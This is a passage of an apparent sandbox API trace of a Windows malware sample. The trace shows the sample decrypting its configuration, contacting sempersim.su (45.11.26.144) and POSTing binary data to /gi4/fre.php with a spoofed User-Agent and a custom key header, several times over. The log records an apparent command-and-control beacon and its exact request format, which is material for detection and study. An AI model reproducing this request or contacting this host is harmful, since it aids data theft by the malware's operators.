(lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0285.776] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0285.776] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0285.776] GetProcessHeap () returned 0x5b0000 [0285.776] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0285.776] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x0) returned 11001 [0285.776] GetProcessHeap () returned 0x5b0000 [0285.777] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0285.777] GetProcessHeap () returned 0x5b0000 [0285.778] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d5f88 | out: hHeap=0x5b0000) returned 1 [0285.778] GetProcessHeap () returned 0x5b0000 [0285.778] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d2f60 | out: hHeap=0x5b0000) returned 1 [0285.778] GetProcessHeap () returned 0x5b0000 [0285.778] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d3398 [0285.779] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0285.779] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0285.788] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0285.789] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5888) returned 1 [0285.794] GetProcessHeap () returned 0x5b0000 [0285.794] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8560 [0285.795] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0285.795] CryptImportKey (in: hProv=0x5c5888, pbData=0x5c8560, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5bde08) returned 1 [0285.796] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0285.798] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0285.799] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0285.799] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0285.799] GetProcessHeap () returned 0x5b0000 [0285.799] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8560 | out: hHeap=0x5b0000) returned 1 [0285.800] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0285.800] CryptDecrypt (in: hKey=0x5bde08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d3398, pdwDataLen=0xdfcfc | out: pbData=0x5d3398, pdwDataLen=0xdfcfc) returned 1 [0285.801] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0285.801] CryptDestroyKey (hKey=0x5bde08) returned 1 [0285.802] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0285.802] CryptReleaseContext (hProv=0x5c5888, dwFlags=0x0) returned 1 [0285.802] GetProcessHeap () returned 0x5b0000 [0285.802] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d6a50 [0285.803] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0285.803] StrStrA (lpFirst="http://sempersim.su/gi4/fre.php", lpSrch="http://") returned="http://sempersim.su/gi4/fre.php" [0285.804] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0285.804] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch="/") returned="/gi4/fre.php" [0285.804] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0285.805] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch=":") returned 0x0 [0285.805] GetProcessHeap () returned 0x5b0000 [0285.805] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0285.805] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x5ce010*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf380*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) returned 0 [0285.806] GetProcessHeap () returned 0x5b0000 [0285.806] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca990 [0285.806] socket (af=2, type=1, protocol=6) returned 0x3ec [0285.806] connect (s=0x3ec, name=0x5cf380*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), namelen=16) returned 0 [0285.882] FreeAddrInfoW (pAddrInfo=0x5ce010*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf380*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) [0285.882] GetProcessHeap () returned 0x5b0000 [0285.882] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7d) returned 0x5c5cc8 [0285.882] GetProcessHeap () returned 0x5b0000 [0285.882] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x201b) returned 0x5d6e28 [0285.882] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0285.883] wvsprintfA (in: param_1=0x5d6e28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 171 [0285.883] GetProcessHeap () returned 0x5b0000 [0285.883] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xad) returned 0x5c6200 [0285.884] GetProcessHeap () returned 0x5b0000 [0285.884] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0285.884] GetProcessHeap () returned 0x5b0000 [0285.884] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e) returned 0x5d3470 [0285.884] GetProcessHeap () returned 0x5b0000 [0285.884] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1fdc) returned 0x5d6e28 [0285.885] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0285.886] wvsprintfA (in: param_1=0x5d6e28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: AA29FF80\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 236 [0285.886] GetProcessHeap () returned 0x5b0000 [0285.886] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xee) returned 0x5cc0b0 [0285.886] GetProcessHeap () returned 0x5b0000 [0285.886] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0285.886] send (s=0x3ec, buf=0x5cc0b0*, len=236, flags=0) returned 236 [0285.888] send (s=0x3ec, buf=0x5d1e18*, len=159, flags=0) returned 159 [0285.888] GetProcessHeap () returned 0x5b0000 [0285.888] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xfd0) returned 0x5d6e28 [0285.888] recv (in: s=0x3ec, buf=0x5d6e28, len=4048, flags=0 | out: buf=0x5d6e28*) returned 237 [0287.385] GetProcessHeap () returned 0x5b0000 [0287.385] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc0b0 | out: hHeap=0x5b0000) returned 1 [0287.385] GetProcessHeap () returned 0x5b0000 [0287.385] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3470 | out: hHeap=0x5b0000) returned 1 [0287.385] GetProcessHeap () returned 0x5b0000 [0287.386] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6200 | out: hHeap=0x5b0000) returned 1 [0287.386] GetProcessHeap () returned 0x5b0000 [0287.386] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c5cc8 | out: hHeap=0x5b0000) returned 1 [0287.386] closesocket (s=0x3ec) returned 0 [0287.387] GetProcessHeap () returned 0x5b0000 [0287.387] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca990 | out: hHeap=0x5b0000) returned 1 [0287.387] GetProcessHeap () returned 0x5b0000 [0287.387] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6a50 | out: hHeap=0x5b0000) returned 1 [0287.387] GetProcessHeap () returned 0x5b0000 [0287.387] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3398 | out: hHeap=0x5b0000) returned 1 [0287.387] GetProcessHeap () returned 0x5b0000 [0287.388] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0287.388] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x5d6e28, dwCreationFlags=0x0, lpThreadId=0xdff08 | out: lpThreadId=0xdff08*=0xcc0) returned 0x3ec [0287.390] Sleep (dwMilliseconds=0xea60) [0287.408] GetProcessHeap () returned 0x5b0000 [0287.408] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d3038 [0287.409] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0287.410] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0287.416] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0287.417] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5cc8) returned 1 [0287.427] GetProcessHeap () returned 0x5b0000 [0287.427] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8560 [0287.428] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0287.428] CryptImportKey (in: hProv=0x5c5cc8, pbData=0x5c8560, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5be048) returned 1 [0287.429] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0287.429] CryptSetKeyParam (hKey=0x5be048, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0287.430] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0287.430] CryptSetKeyParam (hKey=0x5be048, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0287.430] GetProcessHeap () returned 0x5b0000 [0287.431] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8560 | out: hHeap=0x5b0000) returned 1 [0287.432] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0287.432] CryptDecrypt (in: hKey=0x5be048, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d3038, pdwDataLen=0xdfcfc | out: pbData=0x5d3038, pdwDataLen=0xdfcfc) returned 1 [0287.433] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0287.433] CryptDestroyKey (hKey=0x5be048) returned 1 [0287.434] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0287.434] CryptReleaseContext (hProv=0x5c5cc8, dwFlags=0x0) returned 1 [0287.434] GetProcessHeap () returned 0x5b0000 [0287.434] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d5f88 [0287.435] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0287.435] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0287.436] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0287.436] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0287.437] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0287.438] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0287.440] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0287.441] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0287.441] GetProcessHeap () returned 0x5b0000 [0287.441] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb1a0 [0287.441] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x0) returned 11001 [0287.441] GetProcessHeap () returned 0x5b0000 [0287.442] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb1a0 | out: hHeap=0x5b0000) returned 1 [0287.442] GetProcessHeap () returned 0x5b0000 [0287.442] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d5f88 | out: hHeap=0x5b0000) returned 1 [0287.442] GetProcessHeap () returned 0x5b0000 [0287.442] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3038 | out: hHeap=0x5b0000) returned 1 [0287.442] GetProcessHeap () returned 0x5b0000 [0287.442] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d3350 [0287.443] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0287.443] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0287.449] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0287.449] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5cc8) returned 1 [0287.460] GetProcessHeap () returned 0x5b0000 [0287.460] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c86b0 [0287.460] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0287.461] CryptImportKey (in: hProv=0x5c5cc8, pbData=0x5c86b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5be288) returned 1 [0287.461] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0287.462] CryptSetKeyParam (hKey=0x5be288, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0287.462] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0287.463] CryptSetKeyParam (hKey=0x5be288, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0287.463] GetProcessHeap () returned 0x5b0000 [0287.464] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c86b0 | out: hHeap=0x5b0000) returned 1 [0287.464] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0287.464] CryptDecrypt (in: hKey=0x5be288, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d3350, pdwDataLen=0xdfcfc | out: pbData=0x5d3350, pdwDataLen=0xdfcfc) returned 1 [0287.465] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0287.465] CryptDestroyKey (hKey=0x5be288) returned 1 [0287.466] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0287.466] CryptReleaseContext (hProv=0x5c5cc8, dwFlags=0x0) returned 1 [0287.467] GetProcessHeap () returned 0x5b0000 [0287.467] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d5d60 [0287.467] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0287.470] StrStrA (lpFirst="http://sempersim.su/gi4/fre.php", lpSrch="http://") returned="http://sempersim.su/gi4/fre.php" [0287.471] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0287.471] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch="/") returned="/gi4/fre.php" [0287.472] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0287.472] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch=":") returned 0x0 [0287.472] GetProcessHeap () returned 0x5b0000 [0287.472] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb1a0 [0287.473] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x5cdde0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf2a8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) returned 0 [0287.474] GetProcessHeap () returned 0x5b0000 [0287.474] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca8f0 [0287.474] socket (af=2, type=1, protocol=6) returned 0x3f0 [0287.474] connect (s=0x3f0, name=0x5cf2a8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), namelen=16) returned 0 [0287.545] FreeAddrInfoW (pAddrInfo=0x5cdde0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf2a8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) [0287.547] GetProcessHeap () returned 0x5b0000 [0287.547] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7d) returned 0x5c5cc8 [0287.547] GetProcessHeap () returned 0x5b0000 [0287.547] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x201b) returned 0x5d6e28 [0287.548] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0287.549] wvsprintfA (in: param_1=0x5d6e28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 171 [0287.549] GetProcessHeap () returned 0x5b0000 [0287.549] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xad) returned 0x5c6200 [0287.550] GetProcessHeap () returned 0x5b0000 [0287.550] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0287.550] GetProcessHeap () returned 0x5b0000 [0287.550] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e) returned 0x5d31e8 [0287.550] GetProcessHeap () returned 0x5b0000 [0287.550] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1fdc) returned 0x5d6e28 [0287.551] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0287.552] wvsprintfA (in: param_1=0x5d6e28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: AA29FF80\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 236 [0287.552] GetProcessHeap () returned 0x5b0000 [0287.552] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xee) returned 0x5cc0b0 [0287.552] GetProcessHeap () returned 0x5b0000 [0287.552] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0287.552] send (s=0x3f0, buf=0x5cc0b0*, len=236, flags=0) returned 236 [0287.553] send (s=0x3f0, buf=0x5d1e18*, len=159, flags=0) returned 159 [0287.553] GetProcessHeap () returned 0x5b0000 [0287.553] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xfd0) returned 0x5d6e28 [0287.553] recv (in: s=0x3f0, buf=0x5d6e28, len=4048, flags=0 | out: buf=0x5d6e28*) returned 237 [0288.874] GetProcessHeap () returned 0x5b0000 [0288.875] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc0b0 | out: hHeap=0x5b0000) returned 1 [0288.875] GetProcessHeap () returned 0x5b0000 [0288.875] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d31e8 | out: hHeap=0x5b0000) returned 1 [0288.875] GetProcessHeap () returned 0x5b0000 [0288.875] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6200 | out: hHeap=0x5b0000) returned 1 [0288.875] GetProcessHeap () returned 0x5b0000 [0288.876] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c5cc8 | out: hHeap=0x5b0000) returned 1 [0288.876] closesocket (s=0x3f0) returned 0 [0288.878] GetProcessHeap () returned 0x5b0000 [0288.878] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca8f0 | out: hHeap=0x5b0000) returned 1 [0288.878] GetProcessHeap () returned 0x5b0000 [0288.878] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d5d60 | out: hHeap=0x5b0000) returned 1 [0288.878] GetProcessHeap () returned 0x5b0000 [0288.878] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3350 | out: hHeap=0x5b0000) returned 1 [0288.878] GetProcessHeap () returned 0x5b0000 [0288.879] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb1a0 | out: hHeap=0x5b0000) returned 1 [0288.879] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x5d6e28, dwCreationFlags=0x0, lpThreadId=0xdff08 | out: lpThreadId=0xdff08*=0xcc4) returned 0x3f0 [0288.880] Sleep (dwMilliseconds=0xea60) [0288.890] GetProcessHeap () returned 0x5b0000 [0288.890] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d3428 [0288.891] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0288.891] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0288.898] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0288.898] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5998) returned 1 [0288.909] GetProcessHeap () returned 0x5b0000 [0288.909] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c84d0 [0288.910] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0288.910] CryptImportKey (in: hProv=0x5c5998, pbData=0x5c84d0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5bde08) returned 1 [0288.911] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0288.911] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0288.912] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0288.912] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0288.912] GetProcessHeap () returned 0x5b0000 [0288.913] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c84d0 | out: hHeap=0x5b0000) returned 1 [0288.914] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0288.914] CryptDecrypt (in: hKey=0x5bde08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d3428, pdwDataLen=0xdfcfc | out: pbData=0x5d3428, pdwDataLen=0xdfcfc) returned 1 [0288.915] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0288.915] CryptDestroyKey (hKey=0x5bde08) returned 1 [0288.916] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0288.916] CryptReleaseContext (hProv=0x5c5998, dwFlags=0x0) returned 1 [0288.916] GetProcessHeap () returned 0x5b0000 [0288.916] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d63d8 [0288.917] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0288.917] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0288.917] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0288.918] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0288.918] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0288.919] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0288.919] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0288.920] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0288.920] GetProcessHeap () returned 0x5b0000 [0288.920] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0288.920] getaddrinfo (in: 